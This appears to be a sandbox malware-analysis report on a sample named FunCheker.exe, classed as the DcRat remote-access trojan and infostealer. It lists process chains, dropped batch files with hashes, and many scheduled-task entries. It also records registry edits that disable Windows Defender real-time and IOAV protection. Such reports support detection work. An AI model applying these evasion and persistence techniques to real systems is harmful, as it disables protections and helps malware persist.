C:\Users\Default User\System.exe

"C:\Users\Default User\System.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\SzaURWjxsM.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Users\Default User\System.exe

"C:\Users\Default User\System.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\NHYDEKme3A.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Users\Default User\System.exe

"C:\Users\Default User\System.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\WLCDTNV5Zk.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Users\Default User\System.exe

"C:\Users\Default User\System.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\410ZzJtAuR.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Users\Default User\System.exe

"C:\Users\Default User\System.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\DC0SKfNvdG.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Users\Default User\System.exe

"C:\Users\Default User\System.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\T3kbcxG26A.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Users\Default User\System.exe

"C:\Users\Default User\System.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\yaFjl1awzE.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Users\Default User\System.exe

"C:\Users\Default User\System.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\5irhJyFUC1.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Users\Default User\System.exe

"C:\Users\Default User\System.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\HiXkD60p2N.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Users\Default User\System.exe

"C:\Users\Default User\System.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\95TPLp0dsP.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Users\Default User\System.exe

"C:\Users\Default User\System.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\LBVLNHYHv1.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Users\Default User\System.exe

"C:\Users\Default User\System.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\DXR1U0Y5m3.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Users\Default User\System.exe

"C:\Users\Default User\System.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\ST975DOJvB.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

Network

N/A

Files

memory/2444-0-0x000007FEF5723000-0x000007FEF5724000-memory.dmp

memory/2444-1-0x0000000000820000-0x0000000000A0C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Micrasoft.exe

MD5 4eab8d478ffd36a7d96ca9a8512cc447
SHA1 cddb1b2d3656d62cdcc67125ec29f2bf83c5f346
SHA256 a2701733d9e6d3b518072810c779b25dd7ddd683fe36196e259a551acbc1e16a
SHA512 c5dec11ecb61486b87d26f34e90e1107562186ed16c7d9b77d2e7b47456917f2aafc2c61b6b78472a8eeaa84a93a52192c300cf79220bbe8bcc9c080db1e36d6

C:\Users\Admin\AppData\Local\Temp\clear_av.bat

MD5 48d1db006fe2ae378b0f7efd561d7e56
SHA1 63df10216f0ad81d1d42dd2fc8c4483be5d077fc
SHA256 65428112138dff324acd39babd902959dbb78b6ed74a276a1d3c9993ae52847a
SHA512 079fa75df35b8fea18fb220b3f005d6384b28aedb2e5ae62ddd3f6db6abda7dbab091fd44d05dffb4ec41657e052f379267eef7c5126fd8bd7eb189f147806f5

C:\Users\Admin\AppData\Local\Temp\FunChecker .bat

MD5 42afdea7c75bc9074a22ff1be2787959
SHA1 24bc20691a1e99e2cf0b2bca78694701fa47720a
SHA256 3d005de7ab5cd8684deeb07dd7e280659384bc574ebe2293b470e29a092ecbc2
SHA512 d30c5a89fa98534dc53f0e686db7a4eae66c891a4c06f585fcb35f3dcbad372365f175d2b7fa878875812dd9da097181784a35f8f615e8c05668d64a13863bb9

C:\Users\Admin\AppData\Local\Temp\avdisable.bat

MD5 4c35b71d2d89c8e8eb773854085c56ea
SHA1 ede16731e61348432c85ef13df4beb2be8096d9b
SHA256 3efeeaaabfd33ff95934bee4d6d84e4ecb158d1e7777f6eecd26b2746991ed42
SHA512 a6ccbb2913738ca171686a2dd70e96330b0972dadb64f7294ac2b4c9bb430c872ed2bcd360f778962162b9e3be305836fa7f6762b46310c0ad4d6ef0c1cdac8d

memory/2444-35-0x000007FEF5720000-0x000007FEF610C000-memory.dmp

C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\kXeJA.vbe

MD5 9a1c593488c39a17105a4ea268b40a0e
SHA1 90f73ef3dd6c79442f27f481957e60f0deaa3ab4
SHA256 9158f324d6e13bef490aa65d1a88faf7a86ea8f5672a169a1bebcbe6b84bf7b5
SHA512 a955caffe8bd4b697afadaf18f7bb34fe17c1fc7555708a0bff792c301c9b40ebdc680b0e8c50219ea37b23cf3b154f041ec57c549979d3b8f9546b269cdd67d

C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\ZqKnM.bat

MD5 773bdbbe3e641a349d737adddf1223c0
SHA1 682e313b914460eefe3e2cb7a09beeacd461c108
SHA256 606a9b2fe5108baa4a87284abaa58179f02cb4df332e81bf866351b66a04643a
SHA512 0f2a2ac17804b254d91dee3ebba42df3630ffef674ec72102310ed76c9adaa874abb02d7a674183838da8951428a2d8504f6717279fd725be6002565017154a4

\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe

MD5 1876c5d2f6209c7ca5db2b568ec8dc47
SHA1 6bc2ed6ef3bfff6ac95ddeba230634520ea4fe33
SHA256 e580bbab6157f88c10d75fdbf17ac4d971e60d6e81982da6e78dfb28af58a755
SHA512 b2f2a38154cbf531ab5e47c6e310ca2de4a5365055115af2ee5e08a3d2ac1c21db6b964f0b36c69ffe0164b7dafb2552a9bc6ac6a2846247f58564c9a834cf94

memory/1808-49-0x0000000000A40000-0x0000000000C64000-memory.dmp

memory/1808-50-0x0000000000560000-0x000000000057C000-memory.dmp

memory/1808-51-0x0000000002200000-0x0000000002216000-memory.dmp

memory/1808-52-0x000000001B000000-0x000000001B056000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\CbarT2SBYT.bat

MD5 fd4af78910480b801198143e034c7a70
SHA1 36ae3ca66727a9c89c89e15710de374fef842018
SHA256 821abecbcedf393c871323128bba199ef2e3fe458ef67d92a39f3daace4811e8
SHA512 c5e567f4cd0f0bb15aa516ce83f195887a363e4b36c454b72f0a5489f7cc54fc763defac520d58a436e2bac0ec839d70d5397e4dca25a1cd077d61adca5efc04

memory/2448-78-0x0000000000F70000-0x0000000001194000-memory.dmp

memory/2448-79-0x0000000000B20000-0x0000000000B76000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\syYKg8QxNI.bat

MD5 28cea2d0146d39f77b4fd4c4ca8a1332
SHA1 08abdb63ca72466901c22dff844eb540746e09ac
SHA256 9cec9c990144fc6e8384d7e108528e8f282f7351ee3c059507536d95cdb75a72
SHA512 2f4a6e94f53d396619385059dd0fdb82dec842960dc21c2688eb919dbf0038e662ff45c1562f125faba7dbdcfcc3c08208f50fce5f2339287cf059455973e0cc

C:\Users\Admin\AppData\Local\Temp\SaOkt9ru2m.bat

MD5 df4773f9129b9cf115be5e01cc974dcd
SHA1 ac33c525d0fced17956293d912ba0e7a8864f689
SHA256 127da4bddb1c1fa4c0cd3d6c3a525d86e5a629d37f5a5ac71c8f6ac4c974bb49
SHA512 e50add9bc5cf8337d7fc98ba955ae96f5f7d9dc7a41e1d2122b005ec662082328d3ef26280998bdaeead76f5152ae4a7291cd686330961bde925ca91d2354986

memory/2580-92-0x00000000011E0000-0x0000000001404000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\8RIE4o2SCx.bat

MD5 2201eaea2de2c24a9a57fb6907bc1053
SHA1 a89b5b52e86ead88113d601157190903e72354d5
SHA256 8711488963ad1d6499a867f1cd8e596301e31c7b9a34898b9d10d7d758d1b3aa
SHA512 071a9ebd1ae7d2887679734b63ee9b26a8501c8db18b0b17ceb1a021010d519e6a5b536722b5b0ef404123d6331c94535d3a2db5f2b2c86f0e7e092560cc83d6

C:\Users\Admin\AppData\Local\Temp\QRlBHoY6P9.bat

MD5 af663d477ea3cb8e0ab6dec0a54c0468
SHA1 79312354971800ba78c4c063592dbce4f10c9072
SHA256 fe24ea1192c85f6752b3ad9c6e928a4a4d6f4cc50f90d13d3e098d0bf7733740
SHA512 5ba78d9b1ed3d6aeb3a316f76c4d28505b6c0077d48bfc2b3897af104bb934f55d04dc00d50593495ba3f9723572907e97425416c98966c4786dbe8404f80c8c

C:\Users\Admin\AppData\Local\Temp\gPrDhQDX5J.bat

MD5 19bc625e56cd331db53d51659096b3ac
SHA1 00ed66a0dc9dba96e53a354fc7f6a80d3bd0ad79
SHA256 bbe6fdfc3e0e18e50d86165bc7d45c8dcaa69f912342d154bae1b5495ae94b72
SHA512 552165d9ae700e5f2e20770cf2bd3d7f1a924e34317a5680378acca900edf7e7af1a4fae27b515878560c58dba23b7ec0a8430597ef85aa7ea804262ec8bf253

C:\Users\Admin\AppData\Local\Temp\1F0LTC0kP2.bat

MD5 52e6ae137962ea562104d320d0c91864
SHA1 4c4375c9950a1267859e0a47cb5ee707e873ce8e
SHA256 9017c3984a3a3a45506e1f7f461ef48b10064c830b54d44a91ff66e432713d20
SHA512 aa1c34beaca5efa92c88c3c93e5ea16bfc5737f4587b026c8c90afd2792ed0bfa970f5d8b7bb5b7e6a886bce26d0576e7ea7f588d7934b926a9025aba6cdbdab

memory/1716-117-0x00000000012B0000-0x00000000014D4000-memory.dmp

memory/1716-118-0x00000000005C0000-0x0000000000616000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\fmTXnddwCX.bat

MD5 02e98cbd8a083b6029f143d2431be1b4
SHA1 7e936c463f53746a4930ec10ba3da45feef6118e
SHA256 0bf287dadfa1b29cb77df7cc6c3228c20863fa195bdd984f5f9f656f5416f67f
SHA512 62f0c86b4ef41c664736b5c2bd6d9fb868c3ae68d7688c40de3b2dee4c8f6d291361d8f13199b2347e524ac56bcdc1fd6e9c38a492f9c59dd0cf62c1293ecb3a

memory/1608-125-0x0000000000370000-0x0000000000594000-memory.dmp

memory/1608-126-0x00000000020B0000-0x0000000002106000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\b7oBPqXqtO.bat

MD5 2000ad2a4f5c23380024e9db6f9cef02
SHA1 6924ec9921205d02f6824f208d373f505afae7b5
SHA256 11aabb024a5673d908b5df9fc4b0100a75ad5e48605d118e6591c212ae86d347
SHA512 5511cccb3cb73acfc59724975e92cde0a24c4a7c1f32399ff38c83330b92299d7e508d22de5581da5758f0f678d55d7115ab80d62d6692d4dee2aaaf754fcc8c

memory/2232-133-0x0000000000950000-0x0000000000B74000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\aWJwCUxpp4.bat

MD5 af58a175f03d595f8276bd3441112d60
SHA1 23403f89d09a083fb9710f5adbcbddfccab0d765
SHA256 c910b6a3e9a742b3e9f34851844079241f272b0b159eb9a9d7d982cc0e98bd67
SHA512 f92d36d25469fba588991be563eca8787ad65c5b5295f54e61543bb1ad9c98352d8eeaf4d06e2a951b4b998999227ae911f13a4680c8bcdd2c65eb6f37dd0078

memory/2008-140-0x0000000000EB0000-0x00000000010D4000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\UucX7bnqC8.bat

MD5 052f447696425a5548ceda755a697895
SHA1 d9ee05f9eded5410a770f60af8c686b96fe7e9e3
SHA256 908b5afae7857a47a3b1082a809dfcf8f65dee7331c149979033607b7b5b986b
SHA512 b5706aa5beb78f8b6a6de150c5bbda564340f727ae5415f10bec9ab39109846d80af47a3b318a012c516b1a3214763f6c1cf06d45f63818f8fff00274c61419b

C:\Users\Admin\AppData\Local\Temp\FIx4sKIZfl.bat

MD5 55118db681e1df3f90964879125c604b
SHA1 0035cc488e74a82b2644c4902aad1bd259322053
SHA256 d378426e7b25bbe9711a43e52ff3851d69d3ef3aa050a192371a6f02bfa55e5c
SHA512 0526694d8e2a2a45e7c3448ef94c36eb1eea258d672375b5b9dedf0e757cce54d0fba8399da7c177a9fc877a4427713542b2ed1bf58df1099a28d7db1987097c

memory/2552-153-0x00000000011C0000-0x00000000013E4000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\EYKlAcFNfO.bat

MD5 7b265cbaeb1fb2e627f0566a5ae0e2f4
SHA1 c99fc749979fbe76f02a3ac6c8c2e68ab1c7406e
SHA256 426e8b7546f88e843f4909e4bee3a7fd32c0f552c66750473933bb6d796b80c5
SHA512 acbe25f8ffb3e5c752c8cb3fe1fee7f4425b93fdd0d200104e2caa3fedfa2ff14a7d32d852d54a8ccddf99e8cf01b5d5f0f462e9db914db02299073caeef6133

memory/2284-160-0x0000000000620000-0x0000000000676000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\KxKP0srito.bat

MD5 860fa076d02e09eb8c3e41c9d4c5f8b0
SHA1 fd69ee8b387620fe03d373433e44d2518dc3e44e
SHA256 7b2de268908ac92cef856f3730879c22578eeef519d767f35a0178fc69d3476b
SHA512 2ce6aaedde803551e7fd04e22cfeea33fa49f90e2c7bb4187dcb48cbd181738537d88bb64cae4ab57302d559889230e1cde25706d06334130bff958e130ec0bf

C:\Users\Admin\AppData\Local\Temp\L9j9zErPDE.bat

MD5 c08c5835d7da2ff7c5d71134559acf41
SHA1 61c92a80277d8fc19de629056c4671670c79f714
SHA256 57bf22a15124ed06f15748b987f144797027cdac28189277d7d28da4781f4b81
SHA512 bb0ebffed51f9e27e00db227963cde10a30e450b674b9caa3e31e5c3be4eaf9e647b98030a9bc526b3d6514a0b955d38dcfdcd827df9efb915e38b3a3240dd5e

memory/2180-179-0x0000000000360000-0x0000000000584000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\eNTIt1NKYH.bat

MD5 a16dcae3d73bf4bb0ed63ec7f3d8e62c
SHA1 21cb72b7f6ba0c759fde60c6ceb189d27a13fd2d
SHA256 5f289db73a0bf5b750187dfdac5940110ec479bf91118ccf570bfd67a771a07b
SHA512 0279ae264743109364e26577bd6500e34ee26a4a3520f247acd9938664af3e88e1f122a4db360e27c71266b19d4e83ceb603a0d1b00fd6edb4cf6a9acd6bfc28

memory/3052-186-0x0000000000160000-0x0000000000384000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\sPXGbYzrvf.bat

MD5 842cc854180a35de61342e8e70cdf72d
SHA1 91db87cb3df45f0d5a8798b9a8dcc2b8285a8907
SHA256 f304b85e651a23ec7d5c79b581dde09f7d9b2d6ccf44872e3c55b58556e3826b
SHA512 d70552d78f4baeef002af98e484e8e563a9674c3c19b68dab43657d9278cff5bc76d10b27e02e2fb78df43834f79583e8daf80a04c330d315c67d0b06dacdb15

memory/880-193-0x0000000000AF0000-0x0000000000D14000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\0P1AeAAEDQ.bat

MD5 63cbf982ccde2f294846f54e1c935181
SHA1 8ecb425b37c7925f00393583b574e283410b27e5
SHA256 751bd3cbe0687acb6b7819cc2146ff23772fbb66205e7a0501209ef86a2513f2
SHA512 b935e127969f202750abac448e035e8938800eff2471c70a26d716ee03f4ee6f7f098334c13105f02215c05b468da53525b37ba844250f64d287699c9bdec265

memory/852-200-0x0000000000200000-0x0000000000424000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xjNnGM38uG.bat

MD5 e6c26c08ed5a7faed626b3d753ca97bb
SHA1 f5300bcb18a3f2933aa553a1b478a7ce8d587b0a
SHA256 305e4578ef21d10bc0b86b98d9bb30ce1ca733ad2a0cb5824a840f780b6f6535
SHA512 66a23eb46a03aab8295883f6b6e02e5a7e4edd04ab23c3c515753bed719f51b07f0f777aae78c31c24704f7e347baebd24047aa816ff2558bde54281fe9f830b

memory/2140-207-0x0000000000220000-0x0000000000444000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\uuaNNDTqg5.bat

MD5 b7c9a10199d91306b98585ebbc7b0319
SHA1 fa54a12ff377e5cc5e084efd545b54dbf662a860
SHA256 1a3584d8f3b32a4bea2314a4d7872bff923b48b4ef1f4110f8190c2daf8e232b
SHA512 afd9f8f6551b9f6008260127ce0ba487fd7f8eb72b599c8c855ae70ac0d09df7aa36fbc3ca2a518a5cedaa8e4b9dcc73f20a921154c534d04589f8df1c6f80ba

memory/2376-214-0x0000000000C20000-0x0000000000E44000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\dgWvFyiHB2.bat

MD5 e14c4926700d44b8e08e0ca05164e5c8
SHA1 8ce0dd507f2382a91c27b158f938f24c078d626b
SHA256 aa722a447610cadeb5dc0e31536dfa5e955f740db5be510fe49da6cdcc7c146e
SHA512 965ff0473de0afda4302f7b79d13ad1e654ea73d9c4834887a84b0502f03224c04cb6705ec13ab960dfd30ab66f56b753672684f1f227b7d18a9ca8480eabf3c

C:\Users\Admin\AppData\Local\Temp\tebxeZNirC.bat

MD5 77176a2f8916dbf320ece509674b9ac7
SHA1 7090717508053605aecd9c60b6acf27396032e7d
SHA256 03cab28d558fae706a80b7fb00f6bc71b004e41b57e3b40943513bee9cbb9348
SHA512 4bb38636ab2bc33699e76cba2e6391815a13e3741e20842bf85eb99443395ecafee2d8282e1490597842d5a98668cde9366245c8ee57d491d77f79dac753294e

memory/2396-227-0x0000000001130000-0x0000000001354000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\uxMZkGAiOs.bat

MD5 39e0ed5a3af2eb4718f1dcb2f4698eb1
SHA1 f1b926135d30a2929ad7a218cb1fe9c24c1acb7e
SHA256 54af2c33dfb8e9d228b2daab6cbd51f19f7fd6da5ff5b65aa4cced61ca25afd7
SHA512 f8aa40fcdbb3f580077394a05bfceb0e41ab712aa22494d5479f3655d1ea2f1a9c5763d1f292ac8742d6363febb78bc27f4d388b8e9c357bbea9addfeb8c4f55

memory/612-234-0x0000000000B60000-0x0000000000BB6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\WVE2eLfZN7.bat

MD5 3d6de43c3906f5b40a81763df8af10d7
SHA1 52b400efcffbaef2a91c1cd95775aaea8fc8b84e
SHA256 79ad1100e31e6b7bd25740319e0287c1d34ea07ffd1114864eb2dda00c3ce63c
SHA512 7186c1f40ff2f2b391b39ac3dd88e4682edc24be8a74eaea652e220f0b11187994205cb6d3c2942f2b6f69d9a1e5ef5c53ddf5e80de2645bc99427b643fa51cb

C:\Users\Admin\AppData\Local\Temp\C0VS1u4WCC.bat

MD5 144a498f347fa415fc6bbc05f6401e89
SHA1 5ddc00e70c33fb6e31dd50af33de90ca3a86f8db
SHA256 22d12c0b4f91d170453d827ba2ca6a47c1c250e0c1ec99f85c822bdbbb51b412
SHA512 1b05df596359c37bcf8a9d37c7046b980554250a4634c03509ffac37dbc8ef907a3190a21f24edc35c5c5e23a9cbc8d139c77e61725147635a25fc456ca822ea

memory/964-255-0x00000000002F0000-0x0000000000514000-memory.dmp

memory/1040-260-0x00000000001E0000-0x0000000000404000-memory.dmp

memory/1584-265-0x0000000000E50000-0x0000000001074000-memory.dmp

memory/1792-270-0x0000000000390000-0x00000000005B4000-memory.dmp

memory/2332-275-0x0000000000130000-0x0000000000354000-memory.dmp

memory/2332-276-0x00000000007F0000-0x0000000000846000-memory.dmp

memory/592-281-0x00000000000C0000-0x00000000002E4000-memory.dmp

memory/592-282-0x00000000008D0000-0x0000000000926000-memory.dmp

memory/1536-287-0x0000000000860000-0x0000000000A84000-memory.dmp

memory/1536-288-0x000000001A6F0000-0x000000001A746000-memory.dmp

memory/2688-293-0x0000000001210000-0x0000000001434000-memory.dmp

memory/1668-298-0x0000000000590000-0x00000000005E6000-memory.dmp

memory/1584-323-0x00000000012A0000-0x00000000014C4000-memory.dmp

memory/3056-328-0x0000000000210000-0x0000000000434000-memory.dmp

memory/2352-333-0x0000000000840000-0x0000000000A64000-memory.dmp

memory/592-338-0x00000000013A0000-0x00000000015C4000-memory.dmp

memory/2776-343-0x00000000003B0000-0x00000000005D4000-memory.dmp

memory/2776-344-0x0000000002070000-0x00000000020C6000-memory.dmp

memory/2984-349-0x00000000003F0000-0x0000000000614000-memory.dmp

memory/2300-354-0x0000000000ED0000-0x00000000010F4000-memory.dmp

memory/1176-363-0x00000000003C0000-0x00000000005E4000-memory.dmp

memory/2308-368-0x0000000000FA0000-0x00000000011C4000-memory.dmp

memory/1160-373-0x00000000002E0000-0x0000000000504000-memory.dmp

memory/1780-378-0x0000000000330000-0x0000000000554000-memory.dmp

memory/3032-387-0x0000000000240000-0x0000000000464000-memory.dmp

memory/3032-388-0x0000000000630000-0x0000000000686000-memory.dmp

memory/888-393-0x00000000012D0000-0x00000000014F4000-memory.dmp

memory/888-394-0x0000000000760000-0x00000000007B6000-memory.dmp

memory/2704-403-0x0000000000430000-0x0000000000486000-memory.dmp

memory/2816-412-0x0000000000D50000-0x0000000000DA6000-memory.dmp

memory/560-421-0x0000000000270000-0x0000000000494000-memory.dmp

memory/3060-430-0x0000000000D90000-0x0000000000FB4000-memory.dmp

memory/852-435-0x00000000011D0000-0x00000000013F4000-memory.dmp

memory/1824-444-0x0000000000F00000-0x0000000001124000-memory.dmp

memory/2376-449-0x00000000012F0000-0x0000000001514000-memory.dmp

memory/2376-450-0x0000000000650000-0x00000000006A6000-memory.dmp

memory/2636-455-0x0000000001220000-0x0000000001444000-memory.dmp

memory/2636-456-0x0000000000B00000-0x0000000000B56000-memory.dmp

memory/2628-465-0x0000000000120000-0x0000000000344000-memory.dmp

memory/2628-466-0x0000000002220000-0x0000000002276000-memory.dmp

memory/2112-483-0x00000000001C0000-0x00000000003E4000-memory.dmp

memory/1156-496-0x00000000000D0000-0x00000000002F4000-memory.dmp

memory/2948-505-0x0000000000080000-0x00000000002A4000-memory.dmp

memory/2780-514-0x0000000000D50000-0x0000000000F74000-memory.dmp

memory/1072-523-0x0000000000590000-0x00000000005E6000-memory.dmp

memory/1688-528-0x00000000013D0000-0x00000000015F4000-memory.dmp

memory/2424-533-0x0000000000DA0000-0x0000000000FC4000-memory.dmp

memory/1820-546-0x0000000001080000-0x00000000012A4000-memory.dmp

memory/1372-551-0x00000000002B0000-0x00000000004D4000-memory.dmp

memory/472-556-0x00000000010E0000-0x0000000001304000-memory.dmp

memory/3064-557-0x0000000000CF0000-0x0000000000F14000-memory.dmp

memory/2460-562-0x0000000000FB0000-0x00000000011D4000-memory.dmp

memory/1580-567-0x0000000000710000-0x0000000000766000-memory.dmp

memory/2624-572-0x0000000000180000-0x00000000003A4000-memory.dmp

memory/2624-573-0x00000000007B0000-0x0000000000806000-memory.dmp

memory/2816-578-0x0000000000970000-0x0000000000B94000-memory.dmp

memory/1676-587-0x00000000001D0000-0x00000000003F4000-memory.dmp

memory/1608-592-0x0000000000D00000-0x0000000000D56000-memory.dmp

memory/2100-601-0x0000000000300000-0x0000000000524000-memory.dmp

memory/2144-606-0x0000000000A00000-0x0000000000C24000-memory.dmp

memory/2080-607-0x00000000010F0000-0x0000000001314000-memory.dmp

memory/2676-616-0x0000000000AF0000-0x0000000000B46000-memory.dmp

memory/2396-621-0x0000000000020000-0x0000000000244000-memory.dmp

memory/1572-630-0x00000000011A0000-0x00000000013C4000-memory.dmp

memory/2816-639-0x00000000001A0000-0x00000000003C4000-memory.dmp

memory/1712-644-0x00000000012C0000-0x00000000014E4000-memory.dmp

memory/1712-645-0x0000000001270000-0x00000000012C6000-memory.dmp

memory/2172-650-0x0000000000250000-0x0000000000474000-memory.dmp

memory/2220-655-0x0000000000840000-0x0000000000896000-memory.dmp

memory/2820-660-0x0000000001010000-0x0000000001234000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-07-22 19:12

Reported

2024-07-22 19:18

Platform

win10v2004-20240709-en

Max time kernel

247s

Max time network

299s

Command Line

"C:\Users\Admin\AppData\Local\Temp\FunCheker.exe"

Signatures

DcRat

rat infostealer dcrat
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A

Modifies Windows Defender Real-time Protection settings

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" C:\Windows\system32\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Windows\system32\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" C:\Windows\system32\reg.exe N/A
